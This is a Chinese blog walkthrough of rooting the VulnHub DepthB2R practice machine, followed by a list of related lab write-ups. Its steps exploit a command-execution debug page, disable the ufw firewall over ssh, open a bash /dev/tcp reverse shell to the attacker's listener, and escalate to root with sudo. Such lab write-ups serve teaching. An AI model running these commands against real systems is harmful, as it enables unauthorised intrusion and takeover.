VulnHub DepthB2R 靶机渗透

最新推荐文章于 2024-09-26 20:52:03 发布
最新推荐文章于 2024-09-26 20:52:03 发布
阅读量391 收藏
点赞数
分类专栏: VulnHub 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34935231/article/details/115522297
版权

DepthB2R 靶机渗透

目标:得到root权限
作者:shadow
时间:2021-04-08

请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。

一、信息收集

主机ip为172.16.1.22

nmap -p- -A -T5 172.16.1.22

只开放了8080端口,我们看看是什么

二、web渗透

没什么发现,试试nikto扫描下

nikto -h http://172.16.1.22:8080

发现test.jsp 打开看看,是一个debug页面,提示输入ls -l /tmp

可以执行命令,尝试执行反弹shell失败了,我们再看看有什么发现

ls -l /home 发现bill用户

ps aux查看进程发现竟然有ssh,但是为什么nmap没有扫描到呢?猜测有防火墙

查看/etc目录,果然有防火墙,ufw

尝试关闭防火墙

ssh bill@localhost sudo ufw disable

尝试反弹shell 同时本地开启监听

ssh bill@localhost bash -i >& /dev/tcp/172.16.1.4/4444 0>&1

nc -nvlp 4444

成功反弹shell

三、提权

尝试sudo提权

sudo -l

sudo su

成功提权root

 

c2hhZG93
关注
专栏目录
靶机B2R】Bob:1.0.1
干铮的博客
09-26 1179
Bob:1.0.1 下载链接 https://download.vulnhub.com/bob/Bob_v1.0.1.ova 将靶机ova文件导入vmware中,更改网卡配置为桥接直接使用。 1.信息收集 根据已知靶机mac地址查询ip。 确定目标IP Nmap -sP 192.168.43.0/24 端口扫描 Nmap 192.168.43.169 -A -p- -oN namp.A C:\Users\ASUS>Nmap 192.168.43.169 -A -p-
Vulnhub-Lampiao 靶机渗透
Majula
01-30 2262
WalkthroughDownloadDescriptionPen TestingInformation GatheringExploitationReview Download Lampião: 1 ~ VulnHub VM 镜像文件,直接选择 打开虚拟机 即可。 Description Would you like to keep hacking in your own lab? Try this brand new vulnerable machine! “Lampião 1”. Get root!
B2R Raven: 2靶机渗透
weixin_42786460的博客
10-14 1329
B2R Raven: 2靶机渗透
vulnhub系列:DepthB2R
jq_j37的博客
08-03 310
vulnhub系列:DepthB2R靶机,打靶文章
vulnhub depth漏洞复现超详细 呦呦呦
2301_76467680的博客
07-26 196
ps aux发现ssh猜测有防火墙。然后输入ls -l/tmp。反弹shell同时开启监听。查看/etc果然有防火墙。
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(六)covfefe [简单的利用缓冲区溢出提权]
hyjcking的博客
12-01 676
然后我们去访问.ssh目录,发现了三个文件,这三个文件分别对应着公钥、已接受的认证公钥、公钥,我们用kali自带的游览器将三个文件全部下载下来查看。这里发现了几个主要目录robots.txt和.ssh,我们先访问robots.txt,发现有三个目录,依次访问,在第三个目录中找到flag1。找到了usr目录里可读可写可执行的文件read.message,然后./运行它,发现需要我们输入正确的用户名,我们输入Simon后出现一封信。使用nmap对目标靶机端口进行探测,发现开启了22,80,31337端口。
Vulhub靶场WordPress4.6命令执行(PwnScriptum)漏洞复现
X_python321的博客
07-11 710
WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。WordPress会使用PHPMailer组件发送邮件,攻击者在找回密码时通过PHPMailer组件发送重置密码的邮件,利用substr,run等函数构造payload,可造成命令执行漏洞。
DepthB2R靶机渗透测试
weixin_58786230的博客
08-03 255
【代码】DepthB2R靶机渗透测试。
VulnHub DepthB2R 入门靶机渗透
2401_83378606的博客
09-26 360
这里是个登陆界面,从首页看出是个tomcat搭建,从网上看看它的默认密码。既然可以执行命令,那有可能存在命令执行,看看根目录试试。其他都是404,进去看下url也就是之前探测出的目录。尝试看看刚个功能点,这里有四个跳转链接除了这个。尝试访问看看,应该是个tomcat搭建的网站。既然存在命令执行,那就直接反弹shell试试。在/etc 下看看了确实存在,那就尝试关闭。一看吓一跳,所有操作都可以执行root权限。没什么反应,想想问题,先查看了一下进程。可能是防火墙拦截了,那就尝试关闭防火墙。
Vulnhub之acid靶机渗透流程
weixin_44255856的博客
08-03 1045
1,检查靶机主机是否存活。 2,检查靶机开放的端口并对端口进行识别 发现33447端口存活(存在web服务) 由于只存在web服务和apache服务,所以只能从web服务和apache服务下手。 3,首先直接御剑一把梭 大概看了下,先放在这里。 F12查看网页源码,发现存在注释。 0x643239334c6d70775a773d3d16进制转换为字符串d293LmpwZw==,最终解码出来...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub-LasySysAdmin 靶机渗透
Majula
01-30 554
WalkthroughDownloadDescriptionPen TestingScanningSolution IExploitationSolution IIPrivilege EscalationReview Download LazySysAdmin: 1 ~ VulnHub VM 镜像文件。 Description LazySysadmin - The story of a lonely and lazy sysadmin who cries himself to sleep [Hints]
VulnHub PowerGrid 1.0.1靶机渗透
Jonah_Bare的博客
06-25 1197
​本文首发于微信公众号,未经授权,禁止转载。 难度评级:☆☆☆☆☆官网地址:https://download.vulnhub.com/powergrid/PowerGrid-1.0.1.ova天翼云盘:https://cloud.189.cn/t/2UN7Ffiuqyym百度网盘:https://pan.baidu.com/s/10l8dshcdaLxWL7eGN92U4Q 提取码:r4zc官网简介:靶机会进行计时,即使关闭虚拟机也不会停止,超时后将销毁证据渗透目标:获取root权限,找到4个flag本
网络管理:防火墙和安全组配置详解
Echo_Wish的博客
09-22 539
通过本文的介绍,您已经了解了防火墙和安全组的基本概念、配置方法以及常见的使用场景。从安装和配置防火墙,到创建和管理安全组,每一步都至关重要。希望这篇文章能帮助您更好地掌握网络管理的基本技能。如果您有任何问题或需要进一步的帮助,请随时联系我。祝您运维工作顺利!
聚铭下一代智慧安全运营中心荣获CNNVD兼容性资质证书
juminfo的博客
09-23 432
近日,聚铭网络旗下安全产品——聚铭下一代智慧安全运营中心正式通过了国家信息安全漏洞库(CNNVD)兼容性认证测试,荣获国家信息安全漏洞库兼容性资质证书。
安卓开发中,可以反射去换肤,那么我们应该也可以使用反射去串改我们的程序,作为开发者,我们如何保证我们自己的应用的安全呢?
qq_43664361的博客
09-22 467
在安卓开发中,虽然反射提供了强大的动态操作能力,包括访问和修改类、接口、字段以及方法,但这也为潜在的恶意攻击者提供了篡改程序的可能性。作为开发者,我们需要采取一系列措施来确保自己应用的安全,防止反射被用于非法目的。
数据库的全透明加密和半透明加密主要是针对数据存储安全的不同处理方式
weixin_45699851的博客
09-25 189
对于应用程序来说,它处理的是密文,而加密过程和解密过程都是由数据库系统在后台自动完成的。这种模式下,开发者几乎察觉不到加密的存在,查询和操作的速度不会受到影响,因为大部分加密操作都在内存中快速完成。当数据被插入到数据库时,它会被加密,但对于读取数据的应用程序来说,它仍然能看到明文结果。这意味着应用程序需要知道如何处理加密后的数据,比如查询前先解密,然后对解密后的数据进行操作,再加密返回给客户端。这种方式牺牲了一些便利性,但可以提供更好的性能,因为它不需要每次查询都做完整的加密解密处理。
网络编程(5)——模拟伪闭包实现连接的安全回收
最新发布
m0_63086198的博客
09-26 472
new_session通过bind绑定时,new_session的计数就会加一,所以在bind后,new_session的生命周期和新构造函数的生命周期相同,因为新生成的函数对象引用了new_session(new_session通过值传递的方式被复制构造函数使用)。,但是通过bind操作,将new_session作为数值传递给bind函数,而bind函数返回的函数对象内部引用了该new_session所以引用计数增加1,这样保证了new_session不会被释放。今天学习如何通过C11智能指针构造伪。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

c2hhZG93

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值